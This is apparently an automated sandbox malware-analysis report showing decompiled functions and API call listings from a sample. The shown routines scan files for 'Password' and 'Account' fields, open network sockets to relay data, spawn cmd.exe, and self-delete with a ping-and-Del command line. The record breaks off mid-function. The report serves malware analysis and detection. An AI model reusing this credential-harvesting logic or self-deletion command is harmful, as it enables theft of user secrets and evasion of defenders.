                                      • Opcode ID: 3ef6d84ae489e590bc9ab8fb795d1c597b885eb16da18eee616d0a6461f979e1
                                      • Instruction ID: 3cbcffe68eff31fa2f87d064b3c10447c3974c99c8fee215310f2cf42fdca5c6
                                      • Opcode Fuzzy Hash: 3ef6d84ae489e590bc9ab8fb795d1c597b885eb16da18eee616d0a6461f979e1
                                      • Instruction Fuzzy Hash: 09413E71D20629EBCF15EBA0CD929EEB778AF04741F104165AD01B21A2EF705F29CF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025D7A9, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130comUNIQUE
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0025D7C0
                                      • CoInitialize.OLE32(00000000), ref: 0025D7C7
                                      • CoCreateInstance.OLE32(00262460,00000000,00000017,00264330,?), ref: 0025D7E5
                                      • VariantInit.OLEAUT32(?), ref: 0025D869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Initialize$CreateInitInstanceSecurityVariant
                                      • String ID: I+%$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                      • API String ID: 2382742315-2776576809
                                      • Opcode ID: 39be7e817f10581230b67f078ca2c4101b187ec597c6a2ba74435c3cf11beaa4
                                      • Instruction ID: 8bf12090eb19fcfb7748f66618b36cae825df927a2f93bd0f94682449d53a3ed
                                      • Opcode Fuzzy Hash: 39be7e817f10581230b67f078ca2c4101b187ec597c6a2ba74435c3cf11beaa4
                                      • Instruction Fuzzy Hash: 8D411C30A10245EBDB14DB95CC4CEAFBBB8EFCAB15B104098F515E7290D770A95ACB20
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E7699, Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 012E76AF
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E76BB
                                      • _free.LIBCMT ref: 012E76C6
                                      • _free.LIBCMT ref: 012E76D1
                                      • _free.LIBCMT ref: 012E76DC
                                      • _free.LIBCMT ref: 012E76E7
                                      • _free.LIBCMT ref: 012E76F2
                                      • _free.LIBCMT ref: 012E76FD
                                      • _free.LIBCMT ref: 012E7708
                                      • _free.LIBCMT ref: 012E7716
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 117e0b47488f26ed3aeeb9a1a0db72c8b42d119388aebc3ccde10a0aa12d1ecf
                                      • Instruction ID: 982360d326d565d189ac46139af0addf5c5155174028275c2d4e3307a2d5b54c
                                      • Opcode Fuzzy Hash: 117e0b47488f26ed3aeeb9a1a0db72c8b42d119388aebc3ccde10a0aa12d1ecf
                                      • Instruction Fuzzy Hash: 52219676910109AFCB41EF94CC94DEE7BF9FF28254F4085A6F6199B120EB31EA558F80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025878B, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 226fileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E0025878B(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t101;
				char _t103;
				void* _t124;
				intOrPtr _t126;
				char _t127;
				long _t132;
				void* _t134;
				void* _t141;
				void* _t145;
				void* _t146;
				intOrPtr* _t163;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				intOrPtr _t171;
				intOrPtr* _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr* _t176;
				CHAR* _t177;
				void* _t178;
				void* _t179;

				_v36 = __ecx;
				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t173 != 0xffffffff) {
					_t132 = GetFileSize(_t173, 0);
					_v16 = _t132;
					_t170 = E00255ADB(_t132);
					_v32 = _t170;
					E00251052(_t170, 0, _t132);
					_v24 = _v24 & 0x00000000;
					_t179 = _t178 + 0xc;
					ReadFile(_t173, _t170, _t132,  &_v24, 0);
					CloseHandle(_t173);
					_t174 = E00255A3C(0x400000);
					_v28 = _t174;
					_a4 = E00255A3C(0x104);
					_t96 = E00255A3C(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t134 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E00255A2D(_a4);
						E00255A2D(_v12);
						return E00255A2D(_t174);
					} else {
						goto L3;
					}
					do {
						L3:
						_t165 =  *((intOrPtr*)(_t134 + _t170));
						_t13 = _t165 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t165 - 0x3d;
						if(_t165 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t174)) = _t165;
						_t141 = _t141 + 1;
						__eflags = _t165;
						if(_t165 != 0) {
							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
								__eflags =  *_t170 - 0xd0;
								_t101 = 2;
								_t145 = 9;
								_t102 =  !=  ? _t145 : _t101;
								_t146 = ( !=  ? _t145 : _t101) + _t134;
								_t103 =  *((intOrPtr*)(_t146 + _t170));
								_t166 = 0;
								__eflags = _t103 - 0x20;
								if(_t103 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									_v52 = 0;
									_v48 = 0;
									 *((char*)(_t166 +  *_t60)) = 0;
									_v44 = 0;
									E002531EC( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E002531EC( &_v16,  *_t66);
									E00253264( &_v44, E00252ECA( &_v20, __eflags,  &_v32));
									E00255A2D(_v32);
									E00253264( &_v48, E00252ECA( &_v16, __eflags,  &_v32));
									E00255A2D(_v32);
									_v40 = 5;
									E00253264( &_v52, E00253412( &_v32, 0x262608));
									E00255A2D(_v32);
									E00251EB9(_t179 - 0x10,  &_v52);
									E00251EEF(_v36);
									E00255A2D(_v16);
									E00255A2D(_v20);
									E0025138F( &_v52);
									goto L36;
								}
								_t163 = _t146 + _t170;
								__eflags = _t163;
								_t58 =  &_v12; // 0x50
								_t171 =  *_t58;
								while(1) {
									__eflags = _t103 - 0x7f;
									if(_t103 >= 0x7f) {
										goto L35;
									}
									__eflags = _t103 - 0x21;
									if(_t103 == 0x21) {
										goto L35;
									}
									 *((char*)(_t166 + _t171)) = _t103;
									_t166 = _t166 + 1;
									_t163 = _t163 + 1;
									_t103 =  *_t163;
									__eflags = _t103 - 0x20;
									if(_t103 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t170 - 0xd0;
						_t124 = 2;
						_t167 = 9;
						_t125 =  !=  ? _t167 : _t124;
						_t168 = 0;
						_t126 = ( !=  ? _t167 : _t124) + _t134;
						_v20 = _t126;
						_t127 =  *((intOrPtr*)(_t126 + _t170));
						__eflags = _t127 - 0x20;
						if(_t127 <= 0x20) {
							L19:
							 *((char*)(_t168 + _a4)) = 0;
							goto L28;
						}
						_t176 = _v20 + _t170;
						__eflags = _t176;
						_v20 = _t176;
						_t172 = _t176;
						_t177 = _a4;
						while(1) {
							__eflags = _t127 - 0x7f;
							if(_t127 >= 0x7f) {
								break;
							}
							_t172 = _t172 + 1;
							 *((char*)(_t168 + _t177)) = _t127;
							_t168 = _t168 + 1;
							_t127 =  *_t172;
							__eflags = _t127 - 0x20;
							if(_t127 > 0x20) {
								continue;
							}
							break;
						}
						_t174 = _v28;
						_t170 = _v32;
						goto L19;
						L28:
						_t134 = _t134 + 1;
						__eflags = _t134 - _v16;
					} while (_t134 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t173);
			}







































                                      0x00258796
                                      0x002587ae
                                      0x002587b3
                                      0x002587cf
                                      0x002587d3
                                      0x002587dc
                                      0x002587e1
                                      0x002587e4
                                      0x002587e9
                                      0x002587f0
                                      0x002587f9
                                      0x00258800
                                      0x00258810
                                      0x00258819
                                      0x00258823
                                      0x00258826
                                      0x0025882b
                                      0x0025882d
                                      0x00258832
                                      0x00258834
                                      0x00258837
                                      0x00258a22
                                      0x00258a25
                                      0x00258a2d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025883d
                                      0x0025883d
                                      0x0025883d
                                      0x00258840
                                      0x00258843
                                      0x00258845
                                      0x00000000
                                      0x00000000
                                      0x0025884b
                                      0x0025884e
                                      0x00000000
                                      0x00000000
                                      0x00258854
                                      0x00258857
                                      0x00258858
                                      0x0025885a
                                      0x002588f9
                                      0x002588fe
                                      0x00000000
                                      0x00000000
                                      0x00258900
                                      0x00258905
                                      0x00000000
                                      0x00000000
                                      0x00258907
                                      0x0025890c
                                      0x00000000
                                      0x00000000
                                      0x0025890e
                                      0x00258913
                                      0x00000000
                                      0x00000000
                                      0x00258915
                                      0x0025891a
                                      0x00000000
                                      0x00000000
                                      0x0025891c
                                      0x00258921
                                      0x00000000
                                      0x00000000
                                      0x00258923
                                      0x00258928
                                      0x00000000
                                      0x00000000
                                      0x0025892a
                                      0x0025892f
                                      0x00258940
                                      0x00258945
                                      0x00258948
                                      0x00258949
                                      0x0025894c
                                      0x00258951
                                      0x00258954
                                      0x00258956
                                      0x00258958
                                      0x00258972
                                      0x00258972
                                      0x00258979
                                      0x0025897c
                                      0x0025897f
                                      0x00258982
                                      0x00258985
                                      0x0025898a
                                      0x00258990
                                      0x002589a5
                                      0x002589ad
                                      0x002589c2
                                      0x002589ca
                                      0x002589d7
                                      0x002589e7
                                      0x002589ef
                                      0x002589fd
                                      0x00258a05
                                      0x00258a0d
                                      0x00258a15
                                      0x00258a1d
                                      0x00000000
                                      0x00258a1d
                                      0x0025895a
                                      0x0025895a
                                      0x0025895c
                                      0x0025895c
                                      0x0025895f
                                      0x0025895f
                                      0x00258961
                                      0x00000000
                                      0x00000000
                                      0x00258963
                                      0x00258965
                                      0x00000000
                                      0x00000000
                                      0x00258967
                                      0x0025896a
                                      0x0025896b
                                      0x0025896c
                                      0x0025896e
                                      0x00258970
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00258970
                                      0x00000000
                                      0x0025895f
                                      0x00000000
                                      0x0025892f
                                      0x00258860
                                      0x00258863
                                      0x00000000
                                      0x00000000
                                      0x00258869
                                      0x0025886e
                                      0x00000000
                                      0x00000000
                                      0x00258874
                                      0x00258879
                                      0x00000000
                                      0x00000000
                                      0x0025887f
                                      0x00258884
                                      0x00000000
                                      0x00000000
                                      0x0025888a
                                      0x0025888f
                                      0x00000000
                                      0x00000000
                                      0x00258895
                                      0x0025889a
                                      0x00000000
                                      0x00000000
                                      0x002588a0
                                      0x002588a5
                                      0x00000000
                                      0x00000000
                                      0x002588ab
                                      0x002588b0
                                      0x00000000
                                      0x00000000
                                      0x002588b2
                                      0x002588b7
                                      0x002588ba
                                      0x002588bb
                                      0x002588be
                                      0x002588c0
                                      0x002588c2
                                      0x002588c5
                                      0x002588c8
                                      0x002588ca
                                      0x002588ee
                                      0x002588f1
                                      0x00000000
                                      0x002588f5
                                      0x002588cf
                                      0x002588cf
                                      0x002588d1
                                      0x002588d4
                                      0x002588d6
                                      0x002588d9
                                      0x002588d9
                                      0x002588db
                                      0x00000000
                                      0x00000000
                                      0x002588dd
                                      0x002588de
                                      0x002588e1
                                      0x002588e2
                                      0x002588e4
                                      0x002588e6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x002588e6
                                      0x002588e8
                                      0x002588eb
                                      0x00000000
                                      0x00258931
                                      0x00258931
                                      0x00258932
                                      0x00258932
                                      0x00000000
                                      0x0025893b
                                      0x002587b5
                                      0x00000000

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 002587A8
                                      • GetLastError.KERNEL32 ref: 002587B5
                                      • CloseHandle.KERNEL32(00000000), ref: 002587BC
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 002587C9
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002587F9
                                      • CloseHandle.KERNEL32(00000000), ref: 00258800
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateErrorLastReadSize
                                      • String ID: Password$Password
                                      • API String ID: 1366138817-7788977
                                      • Opcode ID: ba9ab555365a743c2eb867b79f5677404768a5529ad42f78ba2d44088c3b62c7
                                      • Instruction ID: 180ba1c2e73587d61ed15c6771b8945e68adfed6d2cc62ee8396841d83a00001
                                      • Opcode Fuzzy Hash: ba9ab555365a743c2eb867b79f5677404768a5529ad42f78ba2d44088c3b62c7
                                      • Instruction Fuzzy Hash: 54815770C34145AEEB20EFA4C8A17BDBB64AF11346F204069E84267293CFB54D6ECB59
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025D0F5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0025D344: WSAStartup.WS2_32(00000202,?), ref: 0025D361
                                        • Part of subcall function 0025D344: socket.WS2_32(00000002,00000001,00000000), ref: 0025D372
                                        • Part of subcall function 0025D344: gethostbyname.WS2_32(?), ref: 0025D380
                                        • Part of subcall function 0025D344: htons.WS2_32(?), ref: 0025D3A6
                                        • Part of subcall function 0025D344: connect.WS2_32(00000000,?,00000010), ref: 0025D3B9
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0025D137
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0025D14C
                                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 0025D15F
                                      • htons.WS2_32(?), ref: 0025D16D
                                      • recv.WS2_32(00000000,?,00000004,00000000), ref: 0025D183
                                      • wsprintfA.USER32 ref: 0025D1D2
                                      • recv.WS2_32(00000000,?,000000FF,00000000), ref: 0025D1EA
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,?,00000001,00000000), ref: 0025D27B
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0025D290
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0025D2A5
                                        • Part of subcall function 0025D2BD: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0025D2DA
                                        • Part of subcall function 0025D2BD: recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
                                        • Part of subcall function 0025D2BD: send.WS2_32(00000000,?,00000000,00000000), ref: 0025D327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
                                      • String ID: %u.%u.%u.%u
                                      • API String ID: 735718650-1542503432
                                      • Opcode ID: 7d76271cabe4856c4a35d723a52d4599fdeebef6afc0779facdedefa47e939f8
                                      • Instruction ID: ef4dc3b3a6fabb0f19007494a561b2b46bb8ac3c29168bdeca896818d0b94b1c
                                      • Opcode Fuzzy Hash: 7d76271cabe4856c4a35d723a52d4599fdeebef6afc0779facdedefa47e939f8
                                      • Instruction Fuzzy Hash: 9841123122420766E725AA6A8C94FBB72CD9FC0301F000429FD94DA192EA74CD2EC79A
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00252803, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108processthreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E00252803() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t63;
				void* _t70;
				void* _t73;

				_t63 = _t70;
				_t73 = _t63;
				E0025EECF(_t73 + 0x10);
				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
					TerminateThread( *0x26679c, 0);
				}
				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
					E0025EFFE(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
					E0025345A( &_v8, _t73 + 0x54);
					E0025EEEA(_t73 + 4,  &_v8);
					E00255A2D(_v8);
					E0025EF4C(_t73 + 4);
				}
				E00251052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0025102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0025102C( &_v817, "\"", 1);
				E0025102C( &_v816,  &_v352, E002510D5( &_v352));
				E0025102C(E002510D5( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}













                                      0x00252803
                                      0x0025f52f
                                      0x0025f534
                                      0x0025f53e
                                      0x0025f547
                                      0x0025f547
                                      0x0025f550
                                      0x0025f564
                                      0x0025f570
                                      0x0025f57b
                                      0x0025f583
                                      0x0025f58a
                                      0x0025f58a
                                      0x0025f596
                                      0x0025f5a0
                                      0x0025f5a4
                                      0x0025f5aa
                                      0x0025f5ab
                                      0x0025f5b4
                                      0x0025f5c8
                                      0x0025f5dc
                                      0x0025f5fc
                                      0x0025f61c
                                      0x0025f63e
                                      0x0025f64d
                                      0x0025f652
                                      0x0025f655

                                      APIs
                                        • Part of subcall function 0025EECF: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0025EED6
                                      • TerminateThread.KERNEL32(00000000,?,?), ref: 0025F547
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0025F5B4
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0025F63E
                                      • CloseHandle.KERNEL32(?), ref: 0025F64D
                                      • CloseHandle.KERNEL32(?), ref: 0025F652
                                      • ExitProcess.KERNEL32 ref: 0025F655
                                      Strings
                                      • |F&, xrefs: 0025F5CF
                                      • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0025F5C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                      • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q $|F&
                                      • API String ID: 3630425516-102366707
                                      • Opcode ID: a406dde772b507ffa65b621020e91b686a515cba565a005b459d1add06f0539a
                                      • Instruction ID: 89e0ae671d0fbed9bfdd21c3eb8cc2c7205607f3bb7eb1c549257c7d8937defe
                                      • Opcode Fuzzy Hash: a406dde772b507ffa65b621020e91b686a515cba565a005b459d1add06f0539a
                                      • Instruction Fuzzy Hash: A73193B2810618FBDB01EBA0CC8AEEF777CEB04301F004461BA05A2051DB74AF68CFA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025FCD9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0025FCD9() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0025FE7E(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0025102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E00251052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E0025FD9E(_t24);
						}
					}
				}
				return _t10;
			}










                                      0x0025fce8
                                      0x0025fceb
                                      0x0025fcf2
                                      0x0025fcfa
                                      0x0025fd03
                                      0x0025fd89
                                      0x0025fd8e
                                      0x0025fd90
                                      0x0025fd92
                                      0x00000000
                                      0x0025fd92
                                      0x0025fd09
                                      0x0025fd1c
                                      0x0025fd24
                                      0x0025fd3b
                                      0x0025fd4a
                                      0x0025fd54
                                      0x0025fd58
                                      0x0025fd59
                                      0x0025fd5a
                                      0x0025fd6f
                                      0x0025fd77
                                      0x0025fd7e
                                      0x0025fd84
                                      0x0025fd94
                                      0x00000000
                                      0x0025fd94
                                      0x0025fd77
                                      0x0025fd03
                                      0x0025fd9d

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00261382,?,?,00000000), ref: 0025FCEB
                                      • IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0025FCF2
                                      • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0025FD16
                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0025FD24
                                      • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0025FD32
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0025FD6F
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0025FD7E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 3151064845-2003734499
                                      • Opcode ID: 0f794040acf1de6f30c4441e6c9fe9505965b0dbe57bbd6c2cb06c9ca1678904
                                      • Instruction ID: 0b4ea1101fc69a9a3eab2715b7e1313ee5dc21b7db0498104950a7a3fcd04b29
                                      • Opcode Fuzzy Hash: 0f794040acf1de6f30c4441e6c9fe9505965b0dbe57bbd6c2cb06c9ca1678904
                                      • Instruction Fuzzy Hash: C811A2B1A01609BBE7109BF4AE89FAF727C9B05745F004431FF05E6091D6B09D1886A5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025ADBE, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025ADBE(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
